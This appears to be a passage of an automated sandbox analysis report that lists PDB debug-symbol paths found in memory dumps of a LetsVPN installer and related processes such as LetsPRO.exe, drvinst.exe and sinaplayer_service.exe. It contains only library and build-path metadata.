              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO\4.1.2.0\System.IO.pdb source: letsvpn-latest.exe, 00000015.00000003.2436159752.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Http.Facade/Release/net461/System.ServiceModel.Http.pdb source: letsvpn-latest.exe, 00000015.00000003.2485461661.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Mannelig\Dev\Projects\NET\WpfToastNotifications\Src\ToastNotifications.Messages\obj\Release\ToastNotifications.Messages.pdb source: letsvpn-latest.exe, 00000015.00000003.2510367582.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq\4.1.2.0\System.Linq.pdb source: letsvpn-latest.exe, 00000015.00000003.2438986157.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\PowerShellStandard\src\5\obj\Release\net452\System.Management.Automation.pdb source: letsvpn-latest.exe, 00000015.00000003.2439963735.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Principal.Windows/net461-Windows_NT-Release/System.Security.Principal.Windows.pdb source: letsvpn-latest.exe, 00000015.00000003.2482765464.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Cng/net462-Windows_NT-Release/System.Security.Cryptography.Cng.pdb source: letsvpn-latest.exe, 00000015.00000003.2476891907.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Http.Facade/Release/net461/System.ServiceModel.Http.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2485461661.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Drawing.Primitives\4.0.2.0\System.Drawing.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2422275505.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb4 source: letsvpn-latest.exe, 00000015.00000003.2387449334.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Data.Common/netfx\System.Data.Common.pdb source: letsvpn-latest.exe, 00000015.00000003.2404217100.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.DriveInfo\4.0.2.0\System.IO.FileSystem.DriveInfo.pdb source: letsvpn-latest.exe, 00000015.00000003.2427925785.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Drawing.Common/net461-Release/System.Drawing.Common.pdb source: letsvpn-latest.exe, 00000015.00000003.2421605703.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Principal.Windows/net461-Windows_NT-Release/System.Security.Principal.Windows.pdbSHA256zqXL source: letsvpn-latest.exe, 00000015.00000003.2482765464.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2448378119.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WebView2Loader.dll.pdb source: letsvpn-latest.exe, 00000015.00000003.2548790969.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2549736766.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2532359681.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Writer\4.0.2.0\System.Resources.Writer.pdb source: letsvpn-latest.exe, 00000015.00000003.2461540941.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\Utils\obj\Release\Utils.pdb} source: letsvpn-latest.exe, 00000015.00000003.2511835079.0000000003107000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2707489755.0000000002AE2000.00000002.00000001.01000000.0000001B.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.FileSystem.AccessControl/net461-Windows_NT-Release/System.IO.FileSystem.AccessControl.pdb source: letsvpn-latest.exe, 00000015.00000003.2427249468.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Syndication/net461-Release/System.ServiceModel.Syndication.pdb source: letsvpn-latest.exe, 00000015.00000003.2488139644.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\obj\Release\net40\Mono.Cecil.pdbSHA256) source: letsvpn-latest.exe, 00000015.00000003.2379243714.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdbSHA2562` source: letsvpn-latest.exe, 00000015.00000003.2383763587.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\winsign\samuli\source\repos\tap-windows6\src\x64\Release\tap0901.pdb source: letsvpn-latest.exe, 00000015.00000003.2342568479.0000000003106000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000026.00000003.2627038541.000001CC02F6C000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000027.00000003.2646713593.000001FA98EA4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\obj\Squirrel\Release\net45\Squirrel.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2393237093.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdb source: letsvpn-latest.exe, 00000015.00000003.2402252974.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Console\4.0.2.0\System.Console.pdb source: letsvpn-latest.exe, 00000015.00000003.2403088896.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netfx\System.Memory.pdb source: letsvpn-latest.exe, 00000015.00000003.2441458716.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.EventBasedAsync\4.0.11.0\System.ComponentModel.EventBasedAsync.pdb source: letsvpn-latest.exe, 00000015.00000003.2399584071.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Primitives\4.0.1.0\System.Reflection.Primitives.pdb$*>* 0*_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\65\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Pipes.AccessControl/netfx\System.IO.Pipes.AccessControl.pdb/5I5 ;5_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2433009064.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.TraceSource\4.0.2.0\System.Diagnostics.TraceSource.pdb source: letsvpn-latest.exe, 00000015.00000003.2420126748.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.UnmanagedMemoryStream\4.0.3.0\System.IO.UnmanagedMemoryStream.pdb source: letsvpn-latest.exe, 00000015.00000003.2435251638.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Timer\4.0.1.0\System.Threading.Timer.pdbt( source: letsvpn-latest.exe, 00000015.00000003.2501476791.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdb source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: InternalNameMono.Cecil.Pdb.dllf! source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPNInfraStructure\obj\Release\LetsVPNInfraStructure.pdb source: letsvpn-latest.exe, 00000015.00000003.2365820399.0000000003107000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3417897670.00000000060D2000.00000002.00000001.01000000.00000025.sdmp
              Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdbBSJB source: letsvpn-latest.exe, 00000015.00000003.2462305635.000000000310C000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3417027693.00000000058E2000.00000002.00000001.01000000.00000023.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256xpRb source: letsvpn-latest.exe, 00000015.00000003.2385172064.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.OleDb/net461-windows-Release/System.Data.OleDb.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.IdentityModel.pdb source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Security\4.0.2.0\System.Net.Security.pdb source: letsvpn-latest.exe, 00000015.00000003.2452861918.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.NetTcp.Facade/Release/net461/System.ServiceModel.NetTcp.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\GitWorkspace\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\net45\ICSharpCode.AvalonEdit.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WebView2Loader.dll.pdb}> source: letsvpn-latest.exe, 00000015.00000003.2549736766.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Numerics\4.0.1.0\System.Runtime.Numerics.pdb source: letsvpn-latest.exe, 00000015.00000003.2466277974.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb source: letsvpn-latest.exe, 00000015.00000003.2426450844.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdbSHA256_- source: letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\IEUser\pusher-websocket-dotnet\PusherClient\obj\release\net46\PusherClient.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2381608570.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlSerializer\4.0.11.0\System.Xml.XmlSerializer.pdb source: letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Threading.AccessControl/net461-windows-Release/System.Threading.AccessControl.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2492363095.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.TypeConverter\4.1.2.0\System.ComponentModel.TypeConverter.pdb source: letsvpn-latest.exe, 00000015.00000003.2400835313.000000000310D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Handles\4.0.1.0\System.Runtime.Handles.pdb,)F) 8)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2464168629.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Extensions\4.0.1.0\System.Reflection.Extensions.pdb source: letsvpn-latest.exe, 00000015.00000003.2457911056.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.AccessControl/net461-windows-Release/System.Security.AccessControl.pdb source: letsvpn-latest.exe, 00000015.00000003.2470703706.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.AppContext\4.1.2.0\System.AppContext.pdb source: letsvpn-latest.exe, 00000015.00000003.2394362077.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\Utils\obj\Release\Utils.pdb source: letsvpn-latest.exe, 00000015.00000003.2511835079.0000000003107000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2707489755.0000000002AE2000.00000002.00000001.01000000.0000001B.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.Concurrent\4.0.11.0\System.Collections.Concurrent.pdb source: letsvpn-latest.exe, 00000015.00000003.2396511276.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NetworkInformation\4.1.2.0\System.Net.NetworkInformation.pdb source: letsvpn-latest.exe, 00000015.00000003.2449881395.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Mono.Cecil.Pdb source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ZMono.Cecil.Pdb, PublicKey=00240000048000009400000006020000002400005253413100040000010001002b5c9f7f04346c324a3176f8d3ee823bbf2d60efdbc35f86fd9e65ea3e6cd11bcdcba3a353e55133c8ac5c4caaba581b2c6dfff2cc2d0edc43959ddb86b973300a479a82419ef489c3225f1fe429a708507bd515835160e10bc743d20ca33ab9570cfd68d479fcf0bc797a763bec5d1000f0159ef619e709d915975e87beebaf source: letsvpn-latest.exe, 00000015.00000003.2379243714.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ObjectModel\4.0.11.0\System.ObjectModel.pdb source: letsvpn-latest.exe, 00000015.00000003.2457151708.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Globalization.Extensions/netfx\System.Globalization.Extensions.pdb source: letsvpn-latest.exe, 00000015.00000003.2424368013.000000000310D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\x86\e_sqlite3.pdb source: letsvpn-latest.exe, 00000015.00000003.2547019952.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.CompilerServices.VisualC\4.0.2.0\System.Runtime.CompilerServices.VisualC.pdb source: letsvpn-latest.exe, 00000015.00000003.2463035170.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2367415267.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb source: letsvpn-latest.exe, 00000015.00000003.2512523323.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Tasks\4.0.11.0\System.Threading.Tasks.pdb source: letsvpn-latest.exe, 00000015.00000003.2495009725.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.ReaderWriter\4.1.1.0\System.Xml.ReaderWriter.pdb source: letsvpn-latest.exe, 00000015.00000003.2505407844.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Formatters\4.0.2.0\System.Runtime.Serialization.Formatters.pdb source: letsvpn-latest.exe, 00000015.00000003.2466940913.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Pkcs/net461-windows-Release/System.Security.Cryptography.Pkcs.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2478524484.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Tasks.Parallel\4.0.1.0\System.Threading.Tasks.Parallel.pdb source: letsvpn-latest.exe, 00000015.00000003.2494267945.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/CommunityToolkit.Mvvm/obj/Release/netstandard2.0/CommunityToolkit.Mvvm.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2347348631.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdb source: letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebSockets.Client\4.0.2.0\System.Net.WebSockets.Client.pdb source: letsvpn-latest.exe, 00000015.00000003.2455072468.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Web.Services.Description/Release/net461/System.Web.Services.Description.pdbSHA256aP source: letsvpn-latest.exe, 00000015.00000003.2503983529.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/net461-windows-Release/System.ServiceProcess.ServiceController.pdb source: letsvpn-latest.exe, 00000015.00000003.2488820018.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.FileSystem.AccessControl/net461-Windows_NT-Release/System.IO.FileSystem.AccessControl.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2427249468.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem\4.0.3.0\System.IO.FileSystem.pdb source: letsvpn-latest.exe, 00000015.00000003.2430089756.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sharpcompress\src\SharpCompress\obj\Release\net45\SharpCompress.pdbL source: letsvpn-latest.exe, 00000015.00000003.2388904149.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Mono.Cecil.Pdb.dll source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: e:\ExpressionRTM\Sparkle\SDK\BlendWPFSDK\Build\Intermediate\Release\Libraries\Microsoft.Expression.Interactions\Win32\Release\Microsoft.Expression.Interactions.pdb source: letsvpn-latest.exe, 00000015.00000003.2370586402.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.OleDb/net461-windows-Release/System.Data.OleDb.pdb source: letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry.AccessControl/net461-windows-Release/Microsoft.Win32.Registry.AccessControl.pdbSHA256a? source: letsvpn-latest.exe, 00000015.00000003.2374971901.000000000310C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPNDomainModel\obj\Release\LetsVPNDomainModel.pdb source: letsvpn-latest.exe, 00000015.00000003.2365247282.0000000003100000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2707740926.0000000002B62000.00000002.00000001.01000000.0000001D.sdmp
              Source: Binary string: e:\ExpressionRTM\Sparkle\SDK\BlendWPFSDK\Build\Intermediate\Release\Libraries\System.Windows.Interactivity\Win32\Release\System.Windows.Interactivity.pdb source: letsvpn-latest.exe, 00000015.00000003.2504717973.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel\4.0.1.0\System.ComponentModel.pdb source: letsvpn-latest.exe, 00000015.00000003.2401491656.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\playercode\branches\branch\bin\Release\sinaplayer_service.pdb source: sinaplayer_service.exe, 00000013.00000000.2209995817.000000000053D000.00000002.00000001.01000000.0000000B.sdmp, sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Primitives.Facade/Release/net461/System.ServiceModel.Primitives.pdbSHA256a3 source: letsvpn-latest.exe, 00000015.00000003.2486911961.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Handles\4.0.1.0\System.Runtime.Handles.pdb source: letsvpn-latest.exe, 00000015.00000003.2464168629.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Text.Encoding.CodePages/net461-windows-Release/System.Text.Encoding.CodePages.pdbSHA256K source: letsvpn-latest.exe, 00000015.00000003.2489791226.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\webview2_api_writer\dotNetAPIWrapper\Microsoft.Web.WebView2.Core\bin\ReleasePackage\Microsoft.Web.WebView2.Core.pdb source: letsvpn-latest.exe, 00000015.00000003.2372287144.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.AccessControl/net461-windows-Release/System.Security.AccessControl.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2470703706.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Numerics.Vectors/net46\System.Numerics.Vectors.pdb source: letsvpn-latest.exe, 00000015.00000003.2456485776.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Pipes\4.0.2.0\System.IO.Pipes.pdb source: letsvpn-latest.exe, 00000015.00000003.2433680162.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.Odbc/net461-windows-Release/System.Data.Odbc.pdbSHA256x source: letsvpn-latest.exe, 00000015.00000003.2405745648.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\rocks\obj\Release\net40\Mono.Cecil.Rocks.pdb source: letsvpn-latest.exe, 00000015.00000003.2378324686.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Primitives\4.0.11.0\System.Net.Primitives.pdbH,b, T,_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2451484814.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/net461-windows-Release/System.Security.Cryptography.ProtectedData.pdb source: letsvpn-latest.exe, 00000015.00000003.2479924642.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Security.SecureString/netfx\System.Security.SecureString.pdb source: letsvpn-latest.exe, 00000015.00000003.2484061202.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.Ports/net461-windows-Release/System.IO.Ports.pdb source: letsvpn-latest.exe, 00000015.00000003.2434348436.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Security.Facade/Release/net461/System.ServiceModel.Security.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2487551781.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\65\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Pipes.AccessControl/netfx\System.IO.Pipes.AccessControl.pdb source: letsvpn-latest.exe, 00000015.00000003.2433009064.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.Primitives\4.1.2.0\System.ComponentModel.Primitives.pdbd+~+ p+_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\rocks\obj\Release\net40\Mono.Cecil.Rocks.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2378324686.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Dynamic.Runtime\4.0.11.0\System.Dynamic.Runtime.pdb source: letsvpn-latest.exe, 00000015.00000003.2422926242.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XDocument\4.0.11.0\System.Xml.XDocument.pdb source: letsvpn-latest.exe, 00000015.00000003.2506456728.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Syndication/net461-Release/System.ServiceModel.Syndication.pdbSHA256Uu source: letsvpn-latest.exe, 00000015.00000003.2488139644.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading\4.0.11.0\System.Threading.pdb source: letsvpn-latest.exe, 00000015.00000003.2502595833.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb source: letsvpn-latest.exe, 00000015.00000003.2425718257.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: letsvpn-latest.exe, 00000015.00000003.2380231891.0000000003105000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2711648046.0000000005742000.00000002.00000001.01000000.0000001E.sdmp
              Source: Binary string: /_/artifacts/obj/System.Threading.AccessControl/net461-windows-Release/System.Threading.AccessControl.pdb source: letsvpn-latest.exe, 00000015.00000003.2492363095.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.FileVersionInfo\4.0.2.0\System.Diagnostics.FileVersionInfo.pdb source: letsvpn-latest.exe, 00000015.00000003.2411480070.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebHeaderCollection\4.0.1.0\System.Net.WebHeaderCollection.pdb source: letsvpn-latest.exe, 00000015.00000003.2454389741.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.Encoding.Extensions\4.0.11.0\System.Text.Encoding.Extensions.pdb source: letsvpn-latest.exe, 00000015.00000003.2490411396.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdb source: letsvpn-latest.exe, 00000015.00000003.2462305635.000000000310C000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3417027693.00000000058E2000.00000002.00000001.01000000.00000023.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2386682491.0000000003104000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3444226642.00000000590F2000.00000002.00000001.01000000.0000002F.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.Specialized\4.0.3.0\System.Collections.Specialized.pdb source: letsvpn-latest.exe, 00000015.00000003.2397620322.0000000003100000.00000004.00000020.00020000.00000000.sdmp
